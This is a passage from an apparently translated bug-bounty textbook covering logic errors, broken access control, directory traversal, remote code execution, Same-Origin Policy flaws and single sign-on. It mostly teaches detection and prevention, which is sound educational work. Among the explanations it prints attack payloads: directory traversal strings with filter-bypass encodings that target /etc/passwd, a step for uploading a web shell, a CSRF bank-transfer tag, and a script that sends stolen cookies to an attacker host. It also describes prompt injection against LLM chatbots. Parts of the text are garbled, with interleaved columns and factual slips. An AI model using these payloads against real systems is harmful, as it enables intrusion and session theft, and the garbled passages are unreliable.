incorrect calculations, allowing an attacker to manipulate prices,
quantities or other important values.
Exploitation Examples of Application Logic Errors
- Parameter Manipulation: An attacker modifies the parame-
ters of an HTTP request (e.g., in the URL or in a form) to bypass
access restrictions or perform unauthorized actions.
- Brute Force Attacks: An attacker attempts to guess pas-
swords, verification codes or other secret values by sending
multiple requests.
- Replay Attacks: An attacker captures a legitimate request
and replays it multiple times to perform an unauthorized action.
- Privilege Escalation Attacks: An attacker exploits an autho-
rization error to gain access to restricted functions or data.
- Denial of Service (DoS) attacks: An attacker exploits a
102 MILLIONAIRE RECORDS
logic error to overload the application and make it inaccessible
to legitimate users.
How to Detect and Prevent Application Logic Bugs
- Code Analysis: Review source code for logic errors, such
as incorrect authorization checks or miscalculations.
- Penetration Testing: Perform security testing to simulate
attacks and discover application logic vulnerabilities.
- Design Review: Analyze application design to identify
potential weaknesses in business logic.
- Threat Modeling: Identify potential threats and design the
application to mitigate them.
- Input Validation: Validate all data provided by the user
to ensure that it is secure and complies with the application
requirements.
- Error Handling: Implement proper error handling to pre-
vent attackers from obtaining sensitive information from error
messages.
- Role-Based Access Control: Implement granular access
control to ensure that users can only access the resources and
functions to which they are entitled.
- Security Auditing: Conduct periodic security audits to
identify and correct application logic vulnerabilities.
Detecting and preventing application logic errors is an
ongoing challenge that requires a multidisciplinary approach and
a combination of tools and techniques. By understanding the
different types of logic errors and how to exploit them, develo-
pers and security professionals can build more secure and resi-
lient applications.
web vulnerabilities 103
2 . 1 2 -B R O K E N A C C E S S
CO N T R O L ( BA C ) # 2. 1 2
Imagine if a bank had no security guards and no safes.
Anyone could walk in and take whatever money they wanted.
In the digital world, Broken Access Controls are the equivalent
of leaving the bank door wide open.
Access controls are the security measures that determine
who can access what resources on a system. When these controls
fail, attackers can exploit these vulnerabilities to access sensitive
information, modify data or even take control of entire systems.
While I love the challenge of finding vulnerabilities of all
kinds, I have to admit that broken access controls have a special
place in my heart. In fact, I consider them my personal gold mine.
In my nearly ten-year career, these little glitches in system
security have brought me more joy (and profit) than any other
type of bug. Why? Because they're like finding an open back
door at Fort Knox. Once you find it, it's like being given the keys
to the kingdom. You can access confidential information, mani-
pulate data at will, and even take control of entire systems. It's
a hacker's dream, isn't it?
Why are access controls important?
Access controls are critical to protect the integrity, confi-
dentiality and availability of data and systems. Without them,
anyone could:
- Access confidential information: Such as financial data,
medical records or trade secrets.
- Modify or delete data: Wreaking havoc on critical systems
or stealing valuable information.
- Perform unauthorized actions: Such as transferring money,
changing passwords or deleting user accounts.
Common Access Control Vulnerabilities
1. Direct Reference to Insecure Objects (IDOR): An atta-
cker manipulates the parameters of a request to access objects
104 MILLIONAIRE RECORDS
to which he should not have access. For example, changing the
user ID in a URL to view another user's data.
Example:
https://sitio.com/perfil?usuario=123
An attacker could change the user value to another
number to view another user's profile.
2. Authentication and Authorization Failures: An atta-
cker can bypass authentication or authorization mechanisms to
gain access to restricted areas of a system. This can occur due to
weak passwords, unsecured sessions or failures in authorization
logic.
3. Incorrect Security Configuration: Access permissions
may be misconfigured, allowing unauthorized users to access
sensitive files or directories.
Example:
4. A configuration file with read permissions for all
users could reveal confidential information, such as database
passwords.
5. Lack of Role Verification: A system may not properly
verify user roles, allowing a user with a lower role to perform
actions that should only be allowed for higher roles.
Mitigating Access Control Vulnerabilities
To protect against vulnerabilities in access controls, it is
crucial to implement the following best practices:
- Principle of Least Privilege: Grant users only the permis-
sions necessary to perform their tasks.
- Strong Authentication and Authorization: Implement
strong authentication and authorization mechanisms, such as
strong passwords, two-factor authentication and role-based
access controls.
- Input Validation: Always validates and sanitizes user input
to prevent IDOR attacks.
- Code Review and Security Testing: Performs comprehen-
sive code reviews and security testing to identify and correct
vulnerabilities.
- Monitoring and Logging: Monitors access logs to detect
suspicious activity and respond quickly to potential security
incidents.

Broken access controls are one of the most common and

dangerous vulnerabilities in web applications and systems.
Protecting access controls is essential to ensuring the security
of your data and systems. By implementing security best practi-
ces, you can significantly reduce the risk of attacks and protect
your organization from financial loss and reputational damage.

web vulnerabilities 105


Advanced Search
Access control is a fundamental component of the security
of any web application. When this control fails, attackers
can gain unauthorized access to restricted functions, data
or resources. This chapter delves into techniques and stra
tegies for finding broken access control vulnerabilities, also
known as "IDOR" (Insecure Direct Object Reference) or
"BAC" (Broken Access Control).
What is Broken Access Control?
Broken access control occurs when an application fails to
properly verify whether a user has permission to access a
specific resource. This can happen due to:
- Direct object references: The application uses predictable
identifiers (such as ID numbers) to access resources, allowing
attackers to manipulate them to access data that does not
belong to them.
- Lack of authorization verification: The application does
not verify whether the user has the necessary permissions
before granting access to a resource.
- Incorrect configuration: Access permissions are miscon
figured, giving users more privileges than they should have.
Techniques for Finding Broken Access Control
1. Parameter Analysis: Examine HTTP request parame
ters for object identifiers (such as user ID, product ID, etc.).
Attempt to manipulate these parameters to see if resources
that should not be available can be accessed.
- Example: Changing the user ID in a URL to try to view
another user's profile.
2. Test Roles and Privileges: Create user accounts with diffe
rent roles and privileges to see if you can access functions
or data restricted to higher roles.
- Example: Trying to access the administration section with
a normal user account.
3. Force Enumeration: Trying to access resources with
sequen
tial identifiers to see if they exist and if they can be acces
106 MILLIONAIRE RECORDS
sed without authorization.
- Example: Try accessing URLs such as /user/1, /user/2, /
user/3, etc.
4. Response Analysis: Watch server responses for sensitive
information that may reveal details about resources or users
that should not be accessed.
- Example: Look for usernames, email addresses or finan
cial data in the responses.
5. Automated Tools: Use web vulnerability scanning tools
that
can help identify broken access control issues.
- Example: OWASP ZAP, Burp Suite.
Examples of Broken Access Control
- Access to other users' data: An attacker can change the
user ID in a URL to view another user's requests.
- Access to administrative functions: A normal user can
access administrative functions by changing a parameter
in a request.
- Access to confidential files: An attacker can download
confidential invoices or reports by manipulating the para
meters of a URL.
Broken Access Control Prevention
- Strict authorization verification: Always verify that the
user has the necessary permissions before allowing access
to a resource.
- Avoid direct object references: Use random identifiers
or session tokens instead of predictable identifiers.
- Input validation: Validate all user input to prevent para
meter tampering.
- Principle of least privilege: Grant users only the permis
sions necessary to perform their tasks.
Bypass protection
Access control is a fundamental component of web appli
cation security. However, when these controls are flawed,
attackers can find ways to bypass them and gain access to
resources, functions or data to which they should not
have access. This chapter explores the techniques and stra
tegies that attackers use to overcome weak access con
trol protections.
1. Identifying Access Controls
Before attempting to circumvent access controls, it is cru
cial to identify how they are implemented in the web appli
cation. Common mechanisms include:
- Authentication: Verification of user identity (e.g., through
login).
- Authorization: Determining user permissions and privile
ges (e.g., user roles).
- Access Control Lists (ACLs): Rules that define which users
or groups can access which resources.
- Input Validation: Verification that the data provided by
the user is valid and secure.
2. Evasion Techniques
Once access controls have been identified, attackers can
employ various techniques to circumvent them:
- Parameter Manipulation: Modifying the parameters of
a request (e.g., in the URL or in the body of a POST request)
to access restricted resources.
- Brute Force Attacks: Testing different combinations of cre
dentials or parameter values to find those that grant access.
- Command Injection: Attempting to inject malicious
commands into the application to bypass access restrictions.
- Request Forgery (CSRF): Tricking an authenticated user
into performing unwanted actions on your behalf.
- Privilege Escalation Attacks: Exploiting vulnerabilities to
gain higher privileges and access restricted resources.
3. Examples of Evasion
- Parameter Manipulation: An attacker modifies the "role"
parameter in a request to change his role from "user" to
"administrator" and gain access to administrative functions.
- Brute Force Attacks: An attacker uses a script to try thou
sands of passwords to find the correct one and gain access
to a protected account.
- Command Injection: An attacker injects an SQL command
web vulnerabilities
into an input field to bypass authentication and gain access
to the database.
- Request Forgery (CSRF): An attacker sends a malicious
link to an authenticated user who, upon clicking on it, per
forms an undesired action, such as changing their email
address.
- Privilege Escalation Attacks: An attacker exploits a vulne
rability in a forum to become a moderator and delete other
users' posts.
Escaling the attack
Access control is a cornerstone of web application security.
When this mechanism fails, attackers can exploit these
vulnerabilities to gain unauthorized access to restricted
functions, data or resources. This chapter delves into how
attackers can escalate their privileges and cause significant
impact by exploiting flawed access controls.
1. Identification of Faulty Access Controls
1. Objective: Find weaknesses in an application's access con
trol implementation.
2. Techniques:
- Manual scanning: Examine the application's source code,
configuration, and behavior to identify inconsistencies or
lack of permissions checking.
- Automated scanning: Use automated scanning tools.
Security analysis to detect common patterns of faulty access
control.
- Penetration testing: Attempting to access restricted func
tions without proper authorization to verify if controls are
functioning properly.
Examples:
- IDOR (Insecure Direct Object Reference): Manipulating
URL parameters or hidden fields to access other users'
resources.
- Lack of role verification: Accessing administrative func
tions without having the role of administrator.
- Object enumeration: Discovering hidden or not directly
referenced resources.
107

Automate the attack
Automating attacks against this type of vulnerability can
reveal systematic weaknesses and escalate the identifica-
tion of vulnerable entry points. This chapter will explore
how to automate faulty access control attacks, from recon-
naissance to exploitation.
Automated Reconnaissance
1. Objective: Identify functions and resources potentially
vulnerable to access control problems.
2. Tools:
- Web crawlers (Crawlers): collect URLs and parameters of
a web application, mapping its structure. Examples: Burp
Suite Spider, ZAP Spider.
- Vulnerability scanners: Search for known patterns of
faulty access control, such as IDOR (Insecure Direct Object
Reference) or lack of role verification. Examples: OWASP
ZAP, Burp Suite.
- Traffic analysis: Inspect HTTP traffic to identify requests
to protected resources and analyze server responses.
Examples: Burp Suite Proxy, Wireshark.
- Example: Use a web crawler to discover all URLs of a web
application and then use a vulnerability scanner to scan
each page for faulty access control patterns.
Automated Parameter and Role Analysis
1. Objective: Identify parameters that can be manipulated
to access unauthorized resources and verify the implemen-
tation of roles and permissions.
2. Tools:
- Param Miner: Extracts parameters from URLs and forms
for further analysis.
- Autorize: Tool to test authorization logic and verify if
access controls are implemented correctly.
108 MILLIONAIRE RECORDS
- Custom Scripts: Develop scripts to automate parameter
manipulation and role verification.
- Example: Use Param Miner to extract all parameters from
a web application and then use a custom script to modify
parameter values and verify if restricted resources can be
accessed.
Brute Force and Enumeration Attacks
1. Objective: To test different parameter values or identi-
fiers to discover hidden resources or access confidential
information.
2. Tools:
- Burp Suite Intruder: Automates the injection of payloads
into parameters to perform brute force and enumeration
attacks.
- Wfuzz: Fuzzing URL and form parameters to discover
hidden resources.
- Custom Scripts: Develop scripts to automate enumera-
tion of identifiers or parameter values.
- Example: Use Burp Suite Intruder to perform a brute force
attack on a user ID parameter to attempt to access other
users' profiles.
Automated Exploitation
1. Goal: Exploit identified flawed access control vulnerabili-
ties to access restricted resources, modify data or perform
unauthorized actions.
2. Tools:
- Exploitation frameworks: automate tasks such as para-
meter modification, privilege escalation and execution of
malicious actions. Examples: Metasploit, Burp Suite.
- Custom scripts: Develop scripts to automate exploitation
in specific scenarios.
- Example: Use a custom script to modify an order ID in an
e-commerce application and change the shipping address
to an address controlled by the attacker.

Automated Monitoring and Alerting

1. Purpose: Receive real-time notifications when a flawed

access control vulnerability is discovered or an exploit
attempt is detected.
2. Tools:

- Intrusion Detection Systems (IDS): monitor network tra-

ffic for attack patterns related to faulty access control.
Examples: Snort, Suricata.

- WAF (Web Application Firewall): Block suspicious requests

that may indicate an exploit attempt.

- Example: Configure a WAF to block requests that attempt

to access protected resources without proper authorization.

Ethical and Legal Considerations

Automating faulty access control attacks must be done in a

responsible and ethical manner. It is critical to obtain pro-
per permission before testing on third-party systems and
to avoid causing damage or disruption.

web vulnerabilities 109

2 . 1 3 - D I R E C T O R Y T R A-
VE R S AL S # 2. 1 3
Imagine you are exploring a building and find a secret door
that leads to restricted areas. In the digital world, Directory
Traversal (or "Path Traversal") is the equivalent of that secret
door, allowing attackers to access files and directories out-
side the web root folder.
In essence, Directory Traversal is a vulnerability that arises
when a web application fails to properly validate user input,
allowing it to manipulate the path to a file or directory. This
can result in reading, and in some cases even modifying or
deleting, sensitive files on the server.
Why is Directory Traversal Dangerous?
Directory Traversal is a serious threat to the security of any
web application. An attacker exploiting this vulnerability can:
- Steal sensitive information: Access configuration files,
passwords, customer data, etc.
- Execute malicious code: Load and execute scripts on the
server, potentially taking control of the system.
- De-configure the website: Modify or delete files, causing
damage to the company's reputation.
How Directory Traversal Works
The root of the problem lies in the way web applications
handle file paths. If an application does not properly vali-
date and sanitize user input, an attacker can insert spe-
cial sequences, such as "../" (colon and slash), to navigate
through the file system.
For example, if a web application uses the following URL
to display an image:
https://sitio.com/mostrar_imagen.php?archivo=imagen.jpg
An attacker could attempt to modify the URL as follows:
https://sitio.com/mostrar_imagen.php?archivo=../../../../
110 MILLIONAIRE RECORDS
etc/passwd
If the application does not validate the input, it could end
up displaying the contents of the /etc/passwd file, which
contains sensitive information about system users.
Examples of Directory Traversal Payloads
Attackers use a variety of payloads to exploit Directory
Traversal vulnerabilities. Some common examples include:
- ../ (colon and slash): Navigates one level up in the direc-
tory tree.
- ....// (four dots and two slashes): Attempts to bypass filters
looking for "../" sequences.
- ..%2f (colon, percent 2f): Encodes the slash in URL to
avoid detection.
- ..%c0%af (colon, percentage c0, percentage af): Encodes
the slash using a Unicode byte sequence.
Mitigating Directory Traversal
To protect against Directory Traversal, it is crucial to imple-
ment the following security measures:
- Input Validation: Never rely on user input. Always validate
and sanitize any data that is used to construct file paths.
- Whitelisting: Instead of trying to block all malicious input,
create a whitelist of allowed files or directories.
- Query Parameterization: Use parameterized queries to
prevent attackers from injecting malicious code into SQL
queries.
- Software Updating: Keep your software updated to fix
known vulnerabilities.
- Security Testing: Perform periodic penetration tests to
identify and fix vulnerabilities before attackers find them.
Directory Traversal is a common but dangerous vulnerabi-
lity that can have serious consequences for the security of
your web application. By understanding how it works and
how to mitigate it, you can protect your data and systems
from attackers.
Remember, security is an ongoing process. You should
always be on the lookout for new threats and update your
defenses accordingly. Exploiting Vulnerabilities

Advanced search
The "Directory Traversal" vulnerability (also known as "Path
Traversal") allows an attacker to access files and directories
outside of the root web directory. This can lead to exposure
of sensitive information, execution of malicious code and
other security risks. This chapter explores how to identify
and exploit these vulnerabilities, as well as best practices
to prevent them.
Understanding Directory Traversal
1. Concept: An attacker manipulates the path of a requested
file to access files outside the root web directory.
2. Examples:
- http://example.com/../../etc/passwd
- http://example.com/images/../admin/config.php
3. Impact:
- Reading of confidential files (passwords, API keys, etc.).
- Execution of malicious code (if the server allows file
uploads)
- Access to restricted directories
Identifying Vulnerabilities
1. Manual analysis:
- Review source code for functions that handle file paths
(e.g., include, require, fopen).
- Testing URL parameters and form data with traversal
sequences (e.g., ../, ..../).
2. Automated tools:
- Vulnerability scanners: look for known Directory Traversal
patterns. Examples: Nikto, OWASP ZAP.
- Fuzzer: They send malicious entries to parameters to test
if they are vulnerable. Examples: Wfuzz, ffuf.
File reading:
- Attempting to access known files (e.g., /etc/passwd, con-
fig.php).
- Using brute force techniques to discover hidden files.
Code execution:
- If the server allows file uploads, attempt to upload a mali-
cious file (e.g., a PHP script) and then access it through
Directory Traversal.
Prevention
Input validation:
- Strictly filter and sanitize all user input used to construct
file paths.
- Validate that file paths are within the root web directory.
Server configuration:
- Disable access to unnecessary directories.
Restrict file and directory permissions.
- Security patches:
- Keep software up to date to fix known vulnerabilities.
Examples of Attacks and Payloads
- Reading files:
1. http://example.com/download.php?file=../../../etc/passwd
2. http://example.com/view.php?page=../../../../var/www/
html/index.php
- Code execution (if file uploading is allowed):
1. Uploading a shell.php file with malicious content.
2. Access it through: http://example.com/uploads/shell.php
Useful Tools
- DirBuster: Brute force tool to discover hidden directo-
ries and files.
- w3af: Web penetration testing framework with a module
to detect Directory Traversal.

web vulnerabilities 111


Bypass protection
Developers implement various protections to mitigate this
risk, but clever attackers are always looking for ways to
bypass them. This chapter explores common evasion techni-
ques and how defenders can strengthen their systems.
Common Evasion Techniques
Coding Sequence "...":
Purpose: To hide the ".." sequence that indicates directory
hopping.
Methods:
- URL encoding: %2e%2e/
- Double URL encoding: %252e%252e/
- Unicode encoding: \u002e%u002e/
Path Manipulation:
Purpose: To confuse the security filter with alternative
paths 2.
Methods:
- Relative paths: file/../../etc/passwd
- Absolute paths: /var/www/html/../../../etc/passwd
- Paths with special characters: ....//....//etc/passwd
Null Termination Attacks:
Purpose: Bypass filters that look for the sequence "..." at
the end of the path.
Method: Add a null character (%00) at the end of the path:
../.../etc/passwd%00
UTF-8 Based Directory Hopping Attacks:
Purpose: To take advantage of alternative special character
encodings in UTF-8 2.
Method: Use encodings such as ..%c0%af or ..%e0%40%af
instead of "...".
Attacks on Applications that Normalize Paths:
Aim: Exploit applications that simplify or normalize paths
before validating them 2.
Method: Use sequences such as // or .. repeated to
112 MILLIONAIRE RECORDS
manipulate the resulting path.
Strengthening Defenses
Strict Validation of Inputs:
1. Validate all user input and reject any suspicious sequences.
2. Use whitelists to allow only specific paths and characters.
Input Sanitization:
1. Remove or replace special characters that can be used
for directory hopping.
Use of Canonical Paths:
1. Convert all paths to their canonical form before
processing.
2. This eliminates ambiguity and makes path manipulation
more difficult.
Secure Server Configuration:
1. Disable symbolic link tracing if it is not necessary.
2. Restrict access to sensitive directories with appropriate
file permissions.
Constant Updating and Patching:
- Keep server software and libraries updated to correct
known vulnerabilities.
Example Attack and Mitigation
- Attack: An attacker attempts to access the /etc/passwd file
using the following URL: http://ejemplo.com/images/../../../
etc/passwd
- Mitigation: The server implements strict input valida-
tion and rejects the request due to the presence of the
../ sequence.
Conclusion
Evasion of directory-hopping protections is a constant
challenge in web security. By understanding evasion techni-
ques and strengthening defenses, developers can protect
their applications and data more effectively.
web vulnerabilities 113
2 . 1 4 - R E M OTE C O DE EX-
ECUT I O N( R C E ) # 2. 1 4
What is RCE, or remote code execution?
A cybersecurity flaw known as remote code execution (RCE)
gives an attacker the ability to execute any code over a
network on a target device or server. RCE is a serious co
ncern because, unlike other cyber threats, it does not require
prior access to the target system.
It is considered a particular type of arbitrary code exec
ution (ACE), which refers to the ability of an attacker to ex
ecute any command on a target system or within a target
process. RCE is distinguished by allowing it to be executed
remotely, giving attackers complete control and access to
a compromised system from any location.
Updating software is essential as many attacks exploit vu
lnerabilities that have been previously patched.
The technological mechanism of RCE involves exploiting
weaknesses in server-side programs or applications. These
vulnerabilities can be due to many flaws, such as incorrect
input validation, unsecured deserialization or buffer
overruns.
The vulnerable application can be tricked by attackers to
execute malicious code as their own by sending specially
crafted requests or data to it. Attackers can gain unauth
orized access to system resources, data and capabilities
through this exploitation procedure, which goes beyond
security protections.
RCE attacks have the potential to cause malware prolifera
tion, data breaches and unauthorized system control.
The development and current importance of RCE
Over time, remote code execution (RCE) attacks have chan
ged from being simple opportunities for hackers to
exploit weaknesses in systems and systems to being
114 MILLIONAIRE RECORDS
sophisticated cyber attacks targeting important infras-
tructure and organizations.
The creation of RCE dates back to the early years of
networked computing, when software flaws served as entry
points for illegal remote system interactions.
RCE attacks became increasingly common as digital infras
tructure became more complex and connected. As a result,
hackers and state-sponsored actors began to target these
vulnerabilities in order to use them for a variety of nefa
rious purposes.
It is impossible to overstate the importance of CER in today's
digital age. The increasing reliance on digital platforms and
services has increased the potential impact of RCE atta
cks, creating risks to the operational continuity of key infras
tructures and services, as well as data security.
Attackers can take control of systems, steal sensitive infor
mation, use ransomware or even disrupt services if they
have the ability to execute arbitrary code remotely.
These actions can have a significant negative impact on an
organization's finances and reputation.
Current statistics and trends show how things are beco
ming increasingly dangerous.
Well-known vulnerabilities affecting millions of devices and
systems worldwide, such as the Log4Shell vulnerability
(CVE-2021-44228) in the Apache Log4j logging library,
have demonstrated the wide potential for exploitation.
Due to the sheer ease of exploitation of the vulnerability
and the variety of systems it affects, the industry as a whole
expressed grave concern and quickly called for mitigation.
The act of exploiting these weaknesses demonstrates the
experience and tenacity of attackers in identifying and
manipulating vulnerabilities in digital systems for malicious
purposes.
In addition, the COVID-19 pandemic has changed the cha
racter of cyber attacks, with a discernible shift away from
the use of more conventional techniques such as Trojans or
backdoors and toward the exploitation of vulnerabilities.
According to Imperva data, cross-path attacks make up
28% of recent intrusions, with RCE attacks in second place.
This suggests that hackers have strategically shifted their
focus to target the most effective ways to infiltrate systems.
RCE is now a major cybersecurity risk due to the complexity
and interconnectedness of the modern digital ecosystem. To
defend against the constantly evolving threat posed by
RCE attacks, both individuals and organizations must take
comprehensive security measures and maintain a state of
alertness.
How do attacks use remote code execution functionality?
Attacks using remote code execution (RCE) often involve
multiple steps and have the potential to cause serious data
breaches, compromise systems and other malicious acts.
Finding vulnerabilities: The attacker starts by locating
software flaws in the victim's operating system, web server
or application. These vulnerabilities could be zero-day flaws
that were previously unknown to the general public or
known issues that have not been addressed.
Create and distribute the exploit: An attacker crea
tes an exploit, or code, to exploit a vulnerability once they
have located it. The target system is then exposed to this
vulnerability using a variety of techniques, including direct
attacks on vulnerable services, social engineering strategies
and malicious emails.
Malicious code execution: The exploit opens a vulnerabi
lity, giving the attacker the ability to inject and execute
web vulnerabilities
malicious code on the machine. The attacker can take con
trol of the system with this code, sometimes referred to as
the payload, and perform malicious operations such as data
theft and system disruption.
RCE attacks can exploit a variety of flaws, such as buf
fer overruns, which occur when an application writes more
data to a buffer than it can handle, and injection vulnerabi
lities, which occur when a program executes unauthori
zed commands because user input was not properly sani
tized. Attackers can gain unauthorized access to sys
tems and execute arbitrary code because of these
vulnerabilities.
Several tactics are used to prevent RCE attacks: frequent
vulnerability scanning to find and fix known vulnerabilities;
strong input validation to stop injection vulnerabilities;
and network monitoring to detect and stop exploitation
attempts.
The effects of RCE attacks
RCE attacks can have catastrophic effects on both indivi
duals and enterprises, resulting in the distribution of ran
somware, unauthorized encryption extraction, data brea
ches, unauthorized access, and denial of service (DoS). These
attacks seriously jeopardize data security and privacy, while
causing damage to finances and reputation.
In order to reduce the likelihood of RCE attacks, com
panies should implement a comprehensive strategy that
encompasses:
1. Vulnerability remediation and software upgrades using
secure encryption techniques; 2.
2. Applying the principle of least privilege
3. Installation of web application firewalls and intrusion
detection/prevention (IDP) systems (WAFs).
4. Execution of code audits and security testing.
Numerous notable RCE vulnerabilities have been identi
fied in recent years, including CVE-2020-17051 affec
ting the Microsoft Windows communication protocol,
CVE2020-1844 in Apple operating system components,
CVe-2021-44228 (Log4Shell) in Apache Log4j, and
115
 CVE-2019-8942 in WordPress.
These weaknesses demonstrate the crucial importance
of caution and the implementation of preventative security
measures to defend against CER attacks.
Real-world consequences and dangers
The practical consequences and dangers associated with
remote code execution (RCE) on AI systems, especially
when it comes to LLMs, are manifold and range from sprea
ding malware to data theft and server takeovers.
An AI-powered customer support chatbot that has been
spoofed by a prompt containing malicious code is one pos
sible scenario. There could be serious security breaches
if this code allows unauthorized access to the chatbot's
server.
In this particular case, fast injection attacks represent a sig
nificant vulnerability.
By inserting malicious hints or directives into LLM inputs,
adversaries can manipulate these models to perform illicit
actions or disclose sensitive information. These types of
attacks take advantage of the complexity and adaptability
of LLMs, which are made to handle huge volumes of data and
provide outputs in response to user inputs. Inadvertent
and potentially dangerous effects, such as data breaches,
illegal system access, or the spread of malware through
AI-driven platforms, could result from manipulation of these
inputs.
116 MILLIONAIRE RECORDS
In an effort to strengthen the security and reliability of AI
systems, ethical frameworks and standards are being imple
mented. The development of ethical standards in AI, such
as accountability, fairness, transparency, and non-mi
sappropriation, is essential to creating reliable and secure
AI applications
In an effort to reduce the dangers associated with technolo
gies such as LLMs, these guidelines direct the development
and implementation of AI systems. Furthermore, investiga
ting these ethical aspects of AI highlights the crucial impor
tance of striking a balance between algorithmic accuracy
and fairness, privacy, and accountability to ensure that AI
technologies are applied to uphold human rights and
promote social good.
Ensuring the resilience and security of AI tools and APIs
against potential RCE attacks is crucial during the crea
tion and implementation of these systems. The commu
nity must be aware of vulnerabilities in AI systems and
constantly evaluate and strengthen security measu
res as AI advances.....
Important lessons learned
Cybercriminals continue to use remote code execution
(RCE) attacks as a dangerous weapon. It is essential to
have a deep awareness of the risk environment to be secure.
The following are the key things to remember:
- RCE flaws are a serious risk as they provide hackers with
the ability to remotely execute malicious code on your
computers.
- Attacks can target both AI models and conventional sys
tems, so new security measures with an AI-specific focus
are needed.
- Mitigation that is proactive is essential: This covers multi
-layered security, robust validation of inputs and routine
remediation.
- AI is both a target and a protection mechanism. Attempt
to protect AI implementation tools, models and procedures.
- It is imperative to act: Put into practice what you have
learned by working with AI specialists specializing in security
and implementing suggested security measures.
The best protection against CER threats is constant vigi
lance and proactive security measures. A stronger and more
resilient cybersecurity posture can be achieved by recog
nizing the severity of the dangers and taking appropriate
action.
In the context of a Bug Bounty program, responsible iden
tification and disclosure of vulnerabilities that enable this
type of attack is of utmost importance. By reporting these
vulnerabilities, security researchers contribute to stren
gthening system security and protecting users from poten
tial malicious attacks.
Prevention and Mitigation

Prevention and mitigation of remote code execution bypass

attacks requires a multifaceted approach. Some of the key
Bypass protection measures include:

- Secure Development: Implement secure development

RCE stands as one of the most critical and sophisticated
threats. This type of attack allows a cybercriminal to bypass
a system's security measures and execute malicious code
remotely, thereby gaining unauthorized control over the
target system.
practices to minimize the introduction of vulnerabilities
into software.
- Software Updates: Keep software up to date with the
latest security patches to correct known vulnerabilities.

Understanding the Anatomy of the Attack
To understand the magnitude of this threat, it is crucial to
unravel the anatomy of a remote code execution bypass
attack. In essence, this attack is based on exploiting vulne
rabilities in software or system configurations. These vulne
rabilities can range from programming errors to incorrect
access permission settings.
- Input Validation: Implement input validation mechanisms
to prevent malicious code injection.
- Access Control: Implement strict access controls to limit
user privileges and prevent unauthorized access.
- Security Monitoring: Implement security monitoring sys
tems to detect and respond to possible attacks.

Once a cybercriminal identifies a vulnerability that can

be exploited, he proceeds to design an attack that allows
him to bypass existing security measures. This may involve
manipulating input parameters, injecting malicious code,
exploiting buffer overflows, or using social engineering
techniques to trick users into gaining unauthorized access.

Devastating Consequences

The consequences of a remote code execution bypass

attack can be devastating. A cybercriminal who succeeds in
executing malicious code on a system can gain access to
sensitive data, install malware, alter the operation of the
system, and even take complete control of the system.

web vulnerabilities 117

2 . 1 5 - SA M E - O R I G I N
PO LI CY B U G S # 2. 1 5 Example:
JavaScript

The Same-Origin Policy (SOP) is a crucial security mecha-
nism in web browsers. It acts as a security guard, preventing
scripts from one source (a combination of protocol, domain and
port) from accessing data from another source. Imagine that
every website is a house; the SOP ensures that your neighbors
can't break in and steal your stuff.
However, like any security system, SOP is not foolproof.
Vulnerabilities in the SOP can allow malicious attackers to breach
these barriers, accessing sensitive information or performing
unauthorized actions on the user's behalf.
Why is Same-Origin Policy important?
<script>
var cookies = document.cookie;
// Send cookies to a server controlled by the attacker.
new Image().src = 'https://atacante.com/robar?cookies='
+ cookies;
</script>
2. Cross-Site Request Forgery (CSRF): An attacker tricks
a user's browser into sending a malicious request to a web-
site where the user is logged in. This can result in unauthorized
actions, such as changing the email address or making a purchase.
Example:
HTML

The SOP is critical to protecting users' privacy and security <img src="https://banco.com/transferir?destinatario=ata-
on the web. Without it, a malicious website could: cante&cantidad=1000" />

- Steal your cookies: Cookies store session information, JSONP (JSON with Padding): JSONP allows a website to
such as login credentials. An attacker could use them to imper- request data from another source. If not implemented correctly,
sonate you. an attacker can use JSONP to gain access to sensitive data.

- Read your private data: They could access personal infor- Example:
mation on other websites, such as your browsing history or pri- JavaScript
vate messages.
function handleResponse(data) {
- Perform actions on your behalf: An attacker could send // Attacker can access the data here
messages, make purchases or change your settings without console.log(data);
your consent. }

Common SOP Vulnerabilities var script = document.createElement('script');

script.src = ' h t t p s : // o t r o s i t i o . c o m /
Despite its importance, SOP can be vulnerable to attacks. datos?callback=handleResponse';
Some of the most common include: document.head.appendChild(script);

1. Cross-site scripting (XSS): an attacker injects mali-

cious code into a legitimate website. When a user visits the site,
the code executes in their browser, potentially stealing their data
or performing unauthorized actions.

118 MILLIONAIRE RECORDS

 Mitigating SOP Vulnerabilities

To protect against SOP vulnerabilities, it is crucial to imple-

ment the following security measures:

- Input validation: Always validate and sanitize user-ente-

red data to prevent XSS attacks.

- CSRF tokens: Use CSRF tokens to protect against CSRF

attacks.

- Content Security Policy (CSP): Implement CSP to con-

trol which scripts can be loaded and executed on your website.

- Secure JSONP configuration: If you use JSONP, make sure

it is configured securely to prevent data disclosure.

Same-Origin Policy is an essential web security tool, but it

is not perfect. Understanding its vulnerabilities and how to miti-
gate them is crucial to protecting your data and privacy online.

web vulnerabilities 119

2 . 1 6 - S I NG L E S I G N- O N
( S S O ) # 2. 16
Imagine having a single key that opens all the doors to your
home, your car, your office and even your safe. Sounds conve-
nient, doesn't it? But what if that key were to get lost or fall into
the wrong hands? In the digital world, Single Sign-On (SSO) is
like that master key: it allows you to access multiple applications
and services with a single set of credentials. However, this con-
venience comes with security risks that should not be ignored.
What is SSO and why is it popular?
SSO is an authentication mechanism that allows users to
access multiple applications and websites with a single login.
Instead of having to remember different usernames and pas-
swords for each service, users only need to remember one set
of credentials to access all of them.
This convenience has made SSO very popular with both
users and enterprises. For users, it means fewer passwords to
remember and a smoother user experience. For enterprises, SSO
can reduce support costs and improve employee productivity.
The Security Risks of SSO
Despite its advantages, SSO also presents significant
security risks:
1. Single Point of Failure: If a user's SSO credentials are
compromised, an attacker could gain access to all applications
and services linked to that account. This can have devastating
consequences, especially if business-critical applications or appli-
cations containing sensitive data are involved.
2. Phishing Attacks: Attackers can use phishing techniques
to trick users into revealing their SSO credentials. Once they have
the credentials, they can access all linked accounts.
3. Vulnerabilities in the Identity Provider (IdP): The IdP is the
service that manages SSO credentials and verifies the identity
of users. If the IdP has vulnerabilities, an attacker could exploit
120 MILLIONAIRE RECORDS
them to gain access to user accounts.
4. Session Management: If SSO sessions are not properly
managed, an attacker could hijack an active session and gain
access to user accounts without needing to know the user's
credentials.
Examples of SSO Attacks
- Phishing Attack: An attacker sends a spoofed email that
appears to come from a legitimate service (e.g., Google or
Microsoft). The email contains a link to a fake login page that
looks like the real page. When the user enters their SSO cre-
dentials on the fake page, the attacker captures them and uses
